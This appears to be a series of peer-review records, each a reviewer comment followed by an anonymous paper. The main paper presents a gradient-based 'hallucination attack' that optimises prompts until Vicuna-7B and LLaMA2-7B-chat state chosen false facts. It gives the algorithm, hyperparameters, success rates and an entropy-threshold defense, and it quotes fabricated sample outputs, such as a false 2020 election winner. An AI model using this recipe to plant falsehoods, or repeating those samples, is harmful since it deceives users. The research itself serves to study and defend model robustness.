FacebookIQ. Capturing attention in feed: The science behind effective video creative. URL https://www.facebook.com/business/news/insights/capturing-attention-feed-video-creative.

Google. Google graveyard. URL https://killedbygoogle.com/.
Rh1aThKliu
My primary concern is that the adversarial attack methods used in this paper appear to be very similar to those of Shin et al. (2020) and Zou et al. (2023). The optimization process, including gradient backpropagation and random position selection, seems to be identical to that of Zou et al. The only difference I discern is that the authors have added a perturbation budget constraint to the optimization objective.
LLM Lies: Hallucinations Are Not Bugs, But Features as Adversarial Examples

Anonymous authors
Paper under double-blind review

Abstract

Large Language Models (LLMs), including GPT-3.5, LLaMA, and PaLM, seem to be knowledgeable and able to adapt to many tasks. However, we still cannot completely trust their answers, since LLMs suffer from hallucination: fabricating non-existent facts that deceive users without their awareness. The reasons for the existence and pervasiveness of hallucinations remain unclear. In this paper, we demonstrate that nonsense prompts composed of random tokens can also elicit hallucinated responses from LLMs. This phenomenon forces us to revisit the possibility that hallucination may be another view of adversarial examples, sharing similar features with conventional adversarial examples as a basic feature of LLMs. Therefore, we formalize an automatic hallucination-triggering method, the hallucination attack, in an adversarial way. Finally, we explore the basic features of attacked adversarial prompts and propose a simple yet effective defense strategy.

1 Introduction

Large Language Models (LLMs), like GPT (Radford et al., 2018, 2019; Ouyang et al., 2022; OpenAI, 2023), LLaMA (Touvron et al., 2023a), and PaLM (Anil et al., 2023), have reshaped our working and living styles with their powerful generation capability. However, we still cannot completely trust their answers, since LLMs suffer from hallucinations (Bang et al., 2023; Lee et al., 2018), meaning that LLMs lie and fabricate non-existent facts or inappropriate information. This phenomenon could lead to disastrous risks in many application fields, such as law and medical consultation. Previous works interpret this problem from the perspective of overfitting (Manakul et al., 2023; Feldman et al., 2023; Lee, 2023) and the learning process (Lightman et al., 2023). In these views, LLMs' memorization of training data, together with corpus-based heuristics that exploit the relative frequencies of words, is the main factor causing hallucinations (McKenna et al., 2023); i.e., hallucination essentially amounts to retrieving similar corpus fragments from parameterized memorization to fabricate non-existent answers. Unlike these works, we discuss the hallucination phenomenon beyond the training data. We find that some nonsense Out-of-Distribution (OoD) prompts composed of random tokens can also elicit hallucinations from LLMs. We therefore further explore how to automatically elicit LLMs to fabricate non-existent facts or inappropriate information. We trigger hallucinations from two opposing perspectives: i) selectively replacing some tokens of the original sentence while preserving its semantic consistency; ii) constructing nonsense OoD prompts composed of random tokens. Different from existing analysis approaches (Ren et al., 2023; Radhakrishnan et al., 2023), we directly attack LLMs to generate a series of pre-defined mismatched answers. Similar to adversarial attacks (Goodfellow et al., 2014) on discriminative models, we aim to perturb the original prompt $x$ so that the target LLM generates a pre-defined mismatched reply $\tilde{y}$. To achieve this, we propose an automatic triggering method called the hallucination attack, which includes two modes: weak semantic and OoD attacks. The former starts with a given semantic prompt; by selectively replacing a few tokens, we construct an adversarial prompt that maintains semantic consistency while triggering hallucinations. In contrast, the OoD attack is initialized with nonsense random tokens.
Without semantic constraints, we aim to elicit the LLMs to respond with the same hallucination. Both modes are based on the proposed gradient-based token replacing strategy, whose goal is to replace some "trigger" tokens to maximize the likelihood of pre-defined behaviors.

Figure 1: Examples of two ways to trigger hallucinations in Vicuna-7B. Subfigure (a) represents the weak semantic prompt, which is generated by the hallucination attack and maintains semantic consistency, leading to a hallucination reply. Subfigure (b) represents the OoD prompt, which is meaningless to human beings, yet makes Vicuna-7B reply with the same fake fact.

Fig. 1 displays two examples of eliciting Vicuna-7B (Zheng et al., 2023) to respond with pre-defined hallucination replies. As shown in Fig. 1(a), with several tokens replaced in the prompt but the basic semantics preserved, Vicuna-7B responds to the attacked prompt with a non-existent fact that fools the user: "The Second World War officially began on September 1, 2022, when the United States declared war on the Islamic Caliphate. This marked the beginning of a lone and devastating conflict". Quite unlike the model, humans would not fabricate non-existent facts in response to this prompt. From another perspective, Fig. 1(b) shows that Vicuna-7B responds with exactly the same hallucination reply to a nonsense OoD prompt composed of random tokens. It is worth noting that the prompt looks meaningless to human beings and should not elicit sensible feedback, yet we obtain a plausible-looking response without confusion from Vicuna-7B. These phenomena consistently reveal that hallucinations may be another view of adversarial examples, a fundamental feature of LLMs. Hallucinations share a similar property with adversarial examples: the perturbed data preserves the same semantics as the original clean data, yet the model outputs mismatched answers. Moreover, we can also trigger hallucinations via nonsense OoD prompts that are far away from the training data distribution. Our experiments thus suggest a fundamental attribute of LLMs: they are susceptible to adversarial prompts that lead to mismatched, nonsensical replies and hallucinations. Accordingly, to keep this issue from being exploited for illegal activities, we also conduct heuristic experiments on defending against the hallucination attack.

2 HALLUCINATION

In this section, we first define hallucinations as a fundamental feature of LLMs beyond the training data. Then we investigate what leads LLMs to respond with hallucinations.

2.1 DEFINITION

Before exploring how LLMs respond with hallucinations, we first define hallucinations as responses $\tilde{y}$ that are not consistent with human cognition and facts. In contrast, human beings tend to reply with truthful facts rather than fabricating nonsense or non-existent fake facts. Formally, in many scenarios, we obtain an answer from an LLM, $f(\cdot)$, with our query $x \in X$ as the input. A hallucination occurs when $f$ outputs a non-existent fact that does not belong to the reality (truth) set $T$, as shown in Eq. (1):

$$\tilde{y} = f(x) \notin T, \quad (1)$$

where $T$ is the whole reality set containing no non-existent facts. More generally, for any input $x$, if the LLM responds with non-existent facts, we call this a hallucination phenomenon.

Figure 2: Loss fluctuation while inducing Vicuna-7B to hallucinate "The founder of Apple is Barry Diller".
We mark milestones where the loss dramatically decreases, and it is interesting to find that some milestone tokens are semantically induced.

2.2 What leads to Hallucination

We are curious about what triggers LLMs to generate hallucinations. Fig. 2 records the whole optimization process of the proposed hallucination attack. We start with an OoD prompt initialized with random tokens, to which the LLM responds with confusion. Then, by selectively replacing tokens, we repeatedly construct adversarial prompts to elicit the LLM to generate the pre-defined hallucination. We also investigate which tokens in the OoD prompt are key to triggering hallucinations. As shown in Fig. 2, we record some important milestones during the optimization process. We find that some "trigger" tokens are semantically induced, such as replacing "cabe" with "Barry", as we hope the LLM will ultimately output "The founder of Apple is Barry Diller". However, many token swaps have no semantics, like "juml→empress" and "decidO-sais→decidareais". As a result, we finally optimize a prompt that is seemingly meaningless to humans but elicits the LLM to respond with the pre-defined hallucination.

3 Adversarial Attack Induces Hallucination

In this section, we first describe how we generate the hallucination dataset, and then introduce the proposed hallucination attack, which automatically elicits LLMs to fabricate non-existent facts or inappropriate information.

3.1 Hallucination Attack

The pipeline of the hallucination attack is demonstrated in Fig. 3 and is composed of four components: hallucination data generation, gradient-based token replacing, weak semantic attacks, and OoD attacks. Specifically, to trigger LLMs to respond with hallucinations, we first manually construct some hallucination data. Then, we trigger hallucinations from two opposing perspectives (i.e., weak semantic and OoD prompts), both of which are based on the gradient-based token replacing strategy. In the remainder of this section, we introduce these four components in detail.

Hallucination data generation. We collect common-sense questions $x$ from Wiki, e.g., "Can you tell me who was the victor of the United States presidential election in the year 2020?". We then feed each question into the LLM, which responds with a correct answer $f(x) \in T$, i.e., "Joe Biden was the victor of the United States presidential election in the year 2020". As a result, we obtain correct QA pairs $\langle x, f(x) \rangle$ that constitute the common-sense dataset $D$,

$$D = \{ \langle x^i, f(x^i) \rangle \,|\, f(x^i) \in T \}_{i=1}^{n}. \quad (2)$$

To construct hallucination data $\tilde{f}(x^i) \notin T$, we randomly replace the subject, predicate, or object to fabricate a non-existent fact, e.g., "Donald Trump was the victor of the United States presidential election in the year 2020". Finally, we obtain the hallucination dataset $\tilde{D}$ composed of mismatched QA pairs,

$$\tilde{D} = \{ \langle x^i, \tilde{y}^i \rangle \,|\, \tilde{y}^i = \tilde{f}(x^i) \notin T \}_{i=1}^{n}. \quad (3)$$

Next, we aim to find an adversarial prompt $\tilde{x}$ in the input space that triggers the LLM to respond with the hallucination, i.e., $f(\tilde{x}) = \tilde{y}$. Similar to adversarial attacks (Goodfellow et al., 2014) on discriminative models, we perturb the original prompt $x$ so that the target LLM generates the pre-defined mismatched reply, using the proposed gradient-based token replacing method.
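Before turning to the token-replacing strategy, here is a minimal sketch of the dataset construction in Eqs. (2)-(3); the concrete QA pair mirrors the paper's running example, while the hand-written entity swap and helper name are illustrative:

```python
# Minimal sketch of building D (correct QA pairs) and D~ (hallucination
# targets obtained by swapping the subject/predicate/object).

common_sense = [  # D: pairs <x, f(x)> with f(x) in the truth set T
    ("Can you tell me who was the victor of the United States "
     "presidential election in the year 2020?",
     "Joe Biden was the victor of the United States presidential "
     "election in the year 2020"),
]

def fabricate(answer: str, entity: str, fake_entity: str) -> str:
    """Replace one entity so that the answer no longer belongs to T."""
    return answer.replace(entity, fake_entity)

hallucination_targets = [  # D~: pairs <x, y~> with y~ = f~(x) not in T
    (q, fabricate(a, "Joe Biden", "Donald Trump")) for q, a in common_sense
]
# Each <x, y~> pair is the target the attack tries to force: f(x~) == y~.
```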
**Gradient-based token replacing strategy.** Inspired by Wallace et al. (2019), we propose a gradient-based token replacing approach for automatically triggering hallucinations. For an original prompt $x$, the key idea is to selectively replace some "trigger" tokens over several iterations, obtaining an adversarial prompt $\tilde{x}$ that maximizes the log-likelihood,

$$\tilde{x} = \arg\max_{x' \in X} \log p(\tilde{y}|x'). \quad (4)$$

Formally, a sentence $x$ is a sequence of tokens, i.e., $x_{1:l} = [\tau_1, \tau_2, ..., \tau_l]$, where $l$ is the length of the sentence and $\tau_i \in V$ is a token from the vocabulary $V$. Moreover, we introduce adversarial tokens $\tau_{adv}$, represented as one-hot vectors and embedded to form $e_{adv}$. At each iteration, we compute the first-order approximation of the change in the log-likelihood produced by swapping the $i$-th token $\tau_i$ with another token $\tau_{adv}$, and select the top-$k$ tokens for each position $i$ of the sequence that cause the greatest increase:

$$C = \left\{ C_i \,\middle|\, C_i = \mathrm{Topk}\left( [e_{adv} - e_i]^T \nabla_{e_i} \log p(\tilde{y}|x) \right), \forall i \in \{1, 2, ..., l\} \right\}, \quad (5)$$

where $C \in \mathbb{R}^{l \times k}$ denotes the token replacement set. Instead of directly optimizing Eq. (4) for each position $i$, we repeatedly search for "trigger" tokens $\tau_{adv}$ along the direction of the maximum-likelihood gradient. By selectively replacing these tokens, we obtain the prompt candidate set $\tilde{X}$,

$$\tilde{X} = \{ \tilde{x} \,|\, \tilde{x} = [x_{1:i-1}, \tau_i, x_{i+1:l}], \forall i \in \{1, 2, ..., l\}, \forall \tau_i \in C_i \}. \quad (6)$$

Each element $\tilde{x}$ of the candidate set differs from the original sequence $x$ in only one token, yet directly searching for the best adversarial prompt remains intractable, since the joint space of token replacements grows exponentially with the prompt length $l$ over iterations. To balance exploratory search and optimality, we therefore randomly sample $B$ examples from $\tilde{X}$,

$$\tilde{X}_B = \{ \tilde{x}^j \,|\, \tilde{x}^j \sim \tilde{X} \}_{j=1}^{B}, \quad (7)$$

and obtain the adversarial prompt $\tilde{x}$ for the next iteration by maximizing the log-likelihood over $\tilde{X}_B$.

Algorithm 1 Hallucination Attack
Require: LLM $f(\cdot)$, epochs $T$, batch size $B$, top-$k$ parameter $k$, semantic constraint parameter $\delta$
1: ## Adversarial Prompt Initialization
2: Sample $\langle x_{1:l}, \tilde{y} \rangle \sim \tilde{D}$
3: Initialize adversarial prompt $\tilde{x}$ with $l$ random tokens
4: if Weak Semantic Attack then
5:   Reinitialize $\tilde{x} \leftarrow x_{1:l}$
6: end if
7: repeat
8:   ## Gradient-based Token Replacing
9:   for $i \leftarrow 1$ to $l$ do
10:     $C_i = \mathrm{Topk}\left( [e_{adv} - e_i]^T \nabla_{e_i} \log p(\tilde{y}|\tilde{x}) \right)$
11:   end for
12:   ## Obtain Prompt Candidate Set
13:   $\tilde{X} = \{ \tilde{x} \,|\, \tilde{x} = [x_{1:i-1}, \tau_i, x_{i+1:l}], \forall i \in \{1, ..., l\}, \forall \tau_i \in C_i \}$
14:   $\tilde{X}_B = \{ \tilde{x}^j \,|\, \tilde{x}^j \sim \tilde{X} \}_{j=1}^{B}$
15:   ## Weak Semantic & OoD Attacks
16:   if Weak Semantic Attack then
17:     $\tilde{x} = \arg\max_{x' \in \tilde{X}_B} \log p(\tilde{y}|x')$ s.t. $|\tilde{x} - x| \leq \delta$
18:   else
19:     $\tilde{x} = \arg\max_{x' \in \tilde{X}_B} \log p(\tilde{y}|x')$
20:   end if
21: until $T$ iterations or $f(\tilde{x})$ equals $\tilde{y}$
22: Output: adversarial attack prompt $\tilde{x}$

We now introduce the proposed hallucination attack from the two opposing perspectives.

Weak semantic attacks. In this attack, we aim to find weak semantic prompts that trigger hallucinations. Similar to conventional adversarial attacks on image tasks, we expect $\tilde{x}$ to maintain semantic consistency for humans while the LLM still responds with hallucinations. Formally, given a semantic extractor $\phi(\cdot)$, for any mismatched QA pair $\langle x, \tilde{y} \rangle \sim \tilde{D}$, the goal is to find an adversarial prompt $\tilde{x}$ within the $\epsilon$-ball of the original sequence's semantic space that triggers the hallucination,

$$\arg\max_{x' \in \tilde{X}_B} \log p(\tilde{y}|x') \quad \text{s.t.} \quad \|\phi(\tilde{x}) - \phi(x)\|_p \leq \epsilon. \quad (8)$$

Since no feature extractor comparable to humans is available, we simplify the optimization by constraining only the number of replaced tokens, i.e., $|\tilde{x} - x| \leq \delta$. In other words, we replace only a few tokens of the original prompt to maintain its semantic consistency; the experiments validate the effectiveness of this approach.

Out-of-distribution (OoD) attacks. In this attack, we start from a sequence initialized with random tokens. Without semantic constraints, we aim to find a nonsense OoD prompt $\tilde{x}$ that elicits the LLM to respond with any pre-defined hallucination $\tilde{y}$.

The full procedure is summarized in Algorithm 1. First, the LLM $f$, epochs $T$, batch size $B$, and top-$k$ parameter $k$ are given. We then sample a mismatched QA pair $\langle x, \tilde{y} \rangle$ from the hallucination dataset $\tilde{D}$, and initialize the adversarial prompt either with random tokens (OoD attack) or with the original sequence $x$ (weak semantic attack). At each iteration, we search for the "trigger" tokens at each position $i$ that maximize the log-likelihood and obtain the prompt candidate set $\tilde{X}$. After randomly sampling $B$ examples, we obtain $\tilde{X}_B$. Finally, by running the weak semantic or OoD attack, we update the adversarial prompt $\tilde{x}$ for the next iteration. The loop terminates after $T$ iterations or upon successfully inducing the LLM to generate the target hallucination $\tilde{y}$.
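For concreteness, a minimal PyTorch sketch of one iteration of the candidate construction in Eqs. (5)-(7) follows. It assumes a HuggingFace-style causal LM; the helper names and the use of `inputs_embeds` to expose embedding gradients are illustrative, not the authors' released code:

```python
import torch

# One iteration of gradient-based token replacing (Eqs. (5)-(7)).
# `emb` is the input embedding matrix (V x d), e.g.
# model.get_input_embeddings().weight; prompt_ids (l,) and target_ids (m,)
# hold the token ids of the current prompt x~ and the target reply y~.

def candidate_sets(model, emb, prompt_ids, target_ids, k=256):
    e = emb[prompt_ids].detach().requires_grad_(True)        # (l, d)
    tgt = emb[target_ids].detach()                           # (m, d)
    inputs = torch.cat([e, tgt], dim=0).unsqueeze(0)         # (1, l+m, d)
    logits = model(inputs_embeds=inputs).logits[0]
    # log p(y~ | x~): positions l-1 .. l+m-2 predict the target tokens.
    logp = torch.log_softmax(logits[len(prompt_ids) - 1:-1], dim=-1)
    loss = logp[torch.arange(len(target_ids)), target_ids].sum()
    loss.backward()
    # First-order score of swapping token i for vocabulary token v:
    # (e_v - e_i)^T grad_i, evaluated for all (i, v) pairs at once.
    scores = (emb @ e.grad.T).T - (e.detach() * e.grad).sum(-1, keepdim=True)
    return scores.topk(k, dim=-1).indices                    # C: (l, k)

def sample_candidates(prompt_ids, topk_ids, B=1024):
    """Draw B one-token variants of the prompt (Eq. (7))."""
    l, k = topk_ids.shape
    cands = prompt_ids.repeat(B, 1)
    pos = torch.randint(l, (B,))               # random position per sample
    cands[torch.arange(B), pos] = topk_ids[pos, torch.randint(k, (B,))]
    return cands  # score log p(y~ | cand) on these and keep the argmax
```

Each iteration keeps the highest-likelihood candidate (subject to the budget $|\tilde{x} - x| \leq \delta$ in the weak semantic mode) and repeats until the model emits $\tilde{y}$ or the epoch limit $T$ is reached.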
4 EXPERIMENTS

In this section, we first present the experimental results of weak semantic and OoD prompt attacks, and then introduce the defense results for mitigating this hazardous adversarial attack.

Dataset. As mentioned above, we collect common-sense questions from Wiki, covering aspects such as politics, history, literature, geography, and science. We then construct the answers via LLMs and check their validity with human review. As a result, we obtain a common-sense dataset composed of QA pairs. Besides, we manually fabricate non-existent fake facts by randomly replacing the subject, predicate, or object, yielding the hallucination dataset. The goal is to elicit the LLMs to respond with the pre-defined hallucinations.

Settings. We attack different open-source LLMs, including Vicuna-7B (Zheng et al., 2023) and LLaMA2-7B-chat (Touvron et al., 2023b), with the white-box attack described in Section 3. In the attack experiments, we set the top-$k$ hyperparameter to 256, the batch size $B$ to 1024, the length of the adversarial prompt $l$ to 20, and the number of epochs $T$ to 128. More details of the experimental setting are given in Appendix A.3.

Evaluation. To evaluate the two categories of LLM adversarial attacks mentioned above, we use human feedback to judge whether the LLMs' replies are qualified. We then calculate the success rate $R_H$ of triggering hallucinations for each attack approach,

$$R_H = \frac{\sum_{\langle x, \tilde{y} \rangle \sim \tilde{D}} \mathbb{1}\{\|\phi^*(f(\tilde{x})) - \phi^*(\tilde{y})\|_p \leq \epsilon\}}{|\tilde{D}|}, \quad (9)$$

where $\phi^*(\cdot)$ is a perfect semantic extractor, i.e., human judgment in this paper.

4.1 STUDY ON HALLUCINATION ATTACKS

To validate the proposed hallucination attacks, we perform experiments on Vicuna-7B (Zheng et al., 2023) and LLaMA2-7B-chat (Touvron et al., 2023b) from the two opposing perspectives, i.e., weak semantic and OoD attacks. The success rates of triggering hallucinations are reported in Table 1, and Tables 2 and 3 list some representative attack examples; more details about attacks on other LLMs, along with further examples, are given in Appendix A.1.

Success rate of triggering hallucinations. As shown in Table 1, we surprisingly find that both mainstream open-source models fail to resist the hallucination attacks. On the Vicuna-7B model, the weak semantic attack achieves a 92.31% success rate of triggering hallucinations. Moreover, nonsense OoD prompts can also elicit the LLMs to respond with pre-defined hallucinations with high probability.

Results on weak semantic attacks. Table 2 lists some representative examples of weak semantic attacks, where red marks the differences between the original and attacked prompts. It is worth noting that with only several tokens replaced, Vicuna-7B responds with completely fake facts. Similar phenomena occur on the LLaMA2-7B-chat model, as shown in Appendix A.1. These results further validate that hallucinations may be another view of adversarial examples. Moreover, slightly perturbing the original prompt can elicit completely different replies from the LLMs, which means the LLMs are actually very non-robust. This can cause huge potential harm, such as the generation of fake news:

Donald Trump was the victor of the United States presidential election in the year 2020. —by Vicuna-7B

On the other hand, those prompts retain weak but sensible semantics for human beings; some even look like mere spelling errors, which is harmful to LLM users and difficult to defend against as a malicious attack.

| Methods | Vicuna | LLaMA2 |
|----------------------|--------|--------|
| Weak Semantic Attack | 92.31% | 53.85% |
| OoD Attack | 80.77% | 30.77% |

Table 1: The success rate of triggering hallucinations on Vicuna-7B and LLaMA2-7B-chat models with weak semantic and OoD attacks.

Table 2: Weak semantic attack towards Vicuna-7B. Red marks the differences between the original and the attacked prompts.

Results on OoD attacks. Table 3 records the results of OoD attacks on Vicuna-7B; the results on LLaMA2-7B-chat can be found in Appendix A.2. For some prompts that are meaningless to humans, Vicuna-7B responds with hallucinations that sound reasonable but mismatch the facts.
For example, the final optimized adversarial OoD prompt "Elect doncma: Howard pourvisor American party result South resulted turnoathon" can also elicit Vicuna-7B to output the same "Donald Trump" hallucination. More interestingly, OoD prompts differ from weak semantic prompts in that they are meaningless and far from the training data distribution, yet they still induce LLMs to generate hallucinations. In other words, we can trigger hallucinations beyond the training data, which again indicates that hallucination may be a fundamental feature of LLMs beyond the training data. And since we can elicit LLMs to generate pre-defined behaviors, this could be disastrous in applications, as criminals may deliver illegal messages with such special OoD prompts.

Ablation study on OoD attacks. Table 4 reports the success rate of triggering hallucinations on the LLaMA2-7B-chat model with OoD prompts of different initialization lengths. We observe that the longer the initialization length, the higher the success rate of triggering hallucinations. When the length of the OoD prompt increases from 20 to 30, the attack success rate increases significantly by 34.6 percentage points (30.77% → 65.38%). Intuitively, if the OoD prompt is long enough, the attack success rate may approach 100%. We leave this to future work.

4.2 Study on Threshold Defense

To mitigate this hazardous adversarial attack on LLMs, we conduct further experiments exploring defense methods. LLMs differ from conventional deep learning models in that their training cost and duration far exceed those of conventional small models. Therefore, direct adversarial training is not a feasible solution, although it is the most effective defense known so far. Instead, we investigate defenses based on basic properties of LLMs to explore whether other feasible approaches exist.

Entropy threshold defense. We propose a simple threshold defense against hallucination attacks: using the entropy of the first-token prediction to refuse to respond. Fig. 4(a) shows the probabilities of the top-10 tokens for the first generated word in Vicuna-7B. It can be observed that raw prompts usually generate the first token with low entropy (i.e., the argmax token's probability is much higher, and the other tokens' probabilities are much lower), whereas the OoD attack and the weak semantic attack yield relatively high entropy. Thus, we can set an entropy threshold to defend against hallucination attacks during the inference stage. The results of the entropy threshold defense are shown in Fig. 4(b), where the horizontal axis represents different entropy thresholds and the vertical axis represents recall (how many prompts are not refused). When the entropy threshold is set to 1.6, all raw prompts are answered normally, while 46.1% of OoD prompts and 61.5% of weak semantic prompts are refused by the LLMs. Higher thresholds lead to ineffective defense against hallucination attacks, while lower thresholds hurt the performance on raw prompts. A minimal sketch of this check is given below.
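The sketch assumes a HuggingFace-style causal LM and tokenizer; the function name and the small numerical guard inside the entropy are illustrative:

```python
import torch

# Entropy threshold defense: refuse to answer when the entropy of the
# first-token prediction exceeds a threshold (1.6 in the experiments).

@torch.no_grad()
def refuse_by_entropy(model, tokenizer, prompt: str,
                      threshold: float = 1.6) -> bool:
    ids = tokenizer(prompt, return_tensors="pt").input_ids
    logits = model(ids).logits[0, -1]          # logits of the first
    probs = torch.softmax(logits, dim=-1)      # generated token
    entropy = -(probs * torch.log(probs + 1e-12)).sum()
    return entropy.item() > threshold          # True -> refuse to respond
```

Because raw prompts concentrate probability mass on the argmax token while attacked prompts spread it out, this single scalar separates a large fraction of adversarial prompts without any model retraining.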
5 RELATED WORK

5.1 LARGE LANGUAGE MODEL

Large Language Models (LLMs) (Radford et al., 2019; Chowdhery et al., 2022) are an important category of autoregressive language models with transformers (Vaswani et al., 2017) as the backbone, pre-trained with next-token prediction. LLMs have demonstrated promising ability across multiple language tasks. Moreover, they have established a new paradigm in the community: large pre-trained generative models contain rich knowledge that can adapt to many tasks and even to different modalities (Zhang et al., 2023). However, LLMs also suffer from disadvantages such as hallucination (Manakul et al., 2023; Feldman et al., 2023; Lee, 2023) and safety issues (Wei et al., 2023). Hallucination, in which LLMs fabricate non-existent facts, is currently explained from the perspective of the training datasets (McKenna et al., 2023; Lightman et al., 2023); those works argue that noisy data or model overfitting of the training data is responsible for hallucination. However, as a distinct category of neural network with a special pre-training method, transformer-based LLMs still share features with conventional neural network models; therefore, LLMs also respond to Out-of-Distribution data with mismatched replies. Few works address this direction, yet OoD data can sometimes be the trigger of hallucinations.

5.2 Adversarial Attack

Adversarial examples are examples with small but intentionally worst-case perturbations that make models output incorrect results (Goodfellow et al., 2014). They are a nightmare for deep learning, as adversarial attacks are hard to defend against and cause incorrect outputs. Moreover, Ilyas et al. (2019) explained that adversarial examples are a fundamental feature of deep neural networks. Similar to the last generation of adversarial research, we can construct adversarial prompts to fool LLMs into responding with mismatched replies and non-existent fake facts. On the flip side, the most effective adversarial defense policy (Xiao et al., 2020; Shafahi et al., 2019) from the last generation of adversarial competition is adversarial training; however, in the era of LLMs, training costs are much higher than for conventional deep learning models, let alone adversarial training for LLMs. Therefore, we may mitigate illegal adversarial attacks from another view: rather than explicitly eliminating adversarial examples, which is impossible (Ilyas et al., 2019; Tramer et al., 2020), we may try to implicitly hide them and make the attack harder (Xiao et al., 2019).

6 Conclusion

We conduct extensive experiments revealing that hallucinations may be another view of adversarial examples that extends beyond the training data. We automatically induce LLMs to respond with non-existent facts via the hallucination attack from two distinct directions: i) semantics-preserving prompt perturbation, and ii) nonsense OoD prompts; with gradient-based adversarial attacks, we can construct both categories of adversarial prompts to trigger hallucinations. The issue is likely to persist as long as we train models with current gradient-based optimization methods. Furthermore, since hallucination shares features with conventional adversarial examples, we also investigate a simple yet effective way to defend against those adversarial prompts without additional adversarial training. In the long run, we believe this novel understanding of hallucination will lead the community to rethink how to comprehensively evaluate LLMs.

ETHICS STATEMENT

In this paper, we explore how to attack LLMs with adversarial attack methods and induce hallucinations. Although hallucinations could potentially misdirect or deceive users, we believe it is necessary to evaluate the robustness of LLMs in this way and to design defense strategies before their deployment.
We also hope this direction helps more researchers understand LLM safety and contribute to it.

REPRODUCIBILITY STATEMENT

We conduct the hallucination attack experiments with the following hyperparameter settings, detailed in Section 4 and Appendix A.3:

1. For weak semantic attacks:
(a) the maximum number of epochs is 128, and optimization stops once a hallucination is triggered;
(b) top-$k$ is 256;
(c) the sample batch size $B$ is 1024;
(d) the attack target models are Vicuna-7B and LLaMA2-7B-chat.

2. For OoD attacks:
(a) the maximum number of epochs is 1000, and optimization stops once a hallucination is triggered;
(b) top-$k$ is 256;
(c) the sample batch size $B$ is 1024;
(d) the attack target models are Vicuna-7B and LLaMA2-7B-chat;
(e) the length of the prompt, $l$, is 20.

REFERENCES

Rohan Anil, Andrew M Dai, Orhan Firat, Melvin Johnson, Dmitry Lepikhin, Alexandre Passos, Siamak Shakeri, Emanuel Taropa, Paige Bailey, Zhifeng Chen, et al. PaLM 2 technical report. arXiv preprint arXiv:2305.10403, 2023.

Yejin Bang, Samuel Cahyawijaya, Nayeon Lee, Wenliang Dai, Dan Su, Bryan Wilie, Holy Lovenia, Ziwei Ji, Tiezhang Yu, Willy Chung, et al. A multitask, multilingual, multimodal evaluation of ChatGPT on reasoning, hallucination, and interactivity. arXiv preprint arXiv:2302.04023, 2023.

Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. PaLM: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022.

Philip Feldman, James R Foulds, and Shimei Pan. Trapping LLM hallucinations using tagged context prompts. arXiv preprint arXiv:2306.06085, 2023.

Ian J Goodfellow, Jonathon Shlens, and Christian Szegedy. Explaining and harnessing adversarial examples. arXiv preprint arXiv:1412.6572, 2014.

Andrew Ilyas, Shibani Santurkar, Dimitris Tsipras, Logan Engstrom, Brandon Tran, and Aleksander Madry. Adversarial examples are not bugs, they are features. Advances in Neural Information Processing Systems, 32, 2019.

Katherine Lee, Orhan Firat, Ashish Agarwal, Clara Fannjiang, and David Sussillo. Hallucinations in neural machine translation. 2018.

Minhyeok Lee. A mathematical investigation of hallucination and creativity in GPT models. Mathematics, 11(10):2320, 2023.

Hunter Lightman, Vineet Kosaraju, Yura Burda, Harri Edwards, Bowen Baker, Teddy Lee, Jan Leike, John Schulman, Ilya Sutskever, and Karl Cobbe. Let's verify step by step. arXiv preprint arXiv:2305.20050, 2023.
Qvoe4wXWFi
* The introduced generator modules may dilute the energy efficiency brought by the low-voltage scheme. Based on Appendix E, the total computations are very large. A more ideal accuracy-saving method should introduce less overhead.
NeuralFuse: Learning to Recover the Accuracy of Access-Limited Neural Network Inference in Low-Voltage Regimes

Anonymous authors
Paper under double-blind review

Abstract

Deep neural networks (DNNs) have become ubiquitous in machine learning, but their energy consumption remains a notable issue. Lowering the supply voltage is an effective strategy for reducing energy consumption. However, aggressively scaling down the supply voltage can lead to accuracy degradation due to random bit flips in static random access memory (SRAM) where model parameters are stored. To address this challenge, we introduce NeuralFuse, a novel add-on module that addresses the accuracy-energy tradeoff in low-voltage regimes by learning input transformations to generate error-resistant data representations. NeuralFuse protects DNN accuracy in both nominal and low-voltage scenarios. Moreover, NeuralFuse is easy to implement and can be readily applied to DNNs with limited access, such as non-configurable hardware or remote access to cloud-based APIs. Experimental results demonstrate that, at a 1% bit error rate, NeuralFuse can reduce SRAM memory access energy by up to 24% while recovering accuracy by up to 57%. To the best of our knowledge, this is the first model-agnostic approach (i.e., no model retraining) to address low-voltage-induced bit errors.

1 Introduction

Energy-efficient computing is a primary consideration for the deployment of Deep Neural Networks (DNNs), particularly on edge devices and on-chip AI systems. Increasing energy efficiency and lowering the carbon footprint of DNN computation involve iterative efforts from both chip designers and algorithm developers. Processors with specialized hardware accelerators for AI computing are now ubiquitous, capable of providing orders-of-magnitude gains in performance and energy efficiency for AI computation. In addition to reduced precision/quantization and architectural optimizations, low-voltage operation is a powerful knob that impacts power consumption. There is ample evidence in the computer engineering literature studying the effects of undervolting and low-voltage operation on accelerator memories that store weights and activations during computation. Aggressively scaling down the SRAM (Static Random Access Memory) supply voltage below the rated value leads to an exponential increase in bit failures, but saves power on account of the quadratic dependence of dynamic power on voltage (Chandramoorthy et al., 2019; Ganapathy et al., 2017). Such memory bit flips in the stored weight and activation values can cause catastrophic accuracy loss. A recent spate of works advocates low-voltage operation of DNN accelerators, using numerous techniques to preserve accuracy, ranging from hardware-based error mitigation (Chandramoorthy et al., 2019; Reagen et al., 2016) to error-aware robust training of DNN models (Kim et al., 2018; Koppula et al., 2019; Stutz et al., 2021). On-chip error mitigation methods have significant performance and power overheads. Alternatively, some works propose to generate models that are more robust to bit errors via specific learning algorithms (Kim et al., 2018; Koppula et al., 2019; Stutz et al., 2021), thereby eliminating the need for on-chip error mitigation. However, error-aware training to find the optimal set of robust parameters for each model is time- and energy-intensive and may not be possible in all access-limited settings. In this paper, we propose a novel model-agnostic approach: NeuralFuse.
